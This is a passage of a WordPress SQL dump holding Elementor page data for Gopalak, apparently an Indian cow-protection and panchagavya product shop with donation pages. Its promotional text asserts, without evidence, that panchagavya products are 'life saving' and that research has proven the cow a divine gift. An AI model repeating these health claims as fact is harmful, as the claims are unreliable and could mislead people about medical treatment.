were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11646,1932,'_elementor_page_assets','a:0:{}'),(11648,1933,'_elementor_edit_mode','builder'),(11649,1933,'_elementor_template_type','wp-page'),(11650,1933,'_elementor_version','3.7.8'),(11651,1933,'_wp_page_template','elementor_canvas'),(11652,1933,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11653,1933,'_elementor_page_assets','a:0:{}'),(11655,1934,'_elementor_edit_mode','builder'),(11656,1934,'_elementor_template_type','wp-page'),(11657,1934,'_elementor_version','3.7.8'),(11658,1934,'_wp_page_template','elementor_canvas'),(11659,1934,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 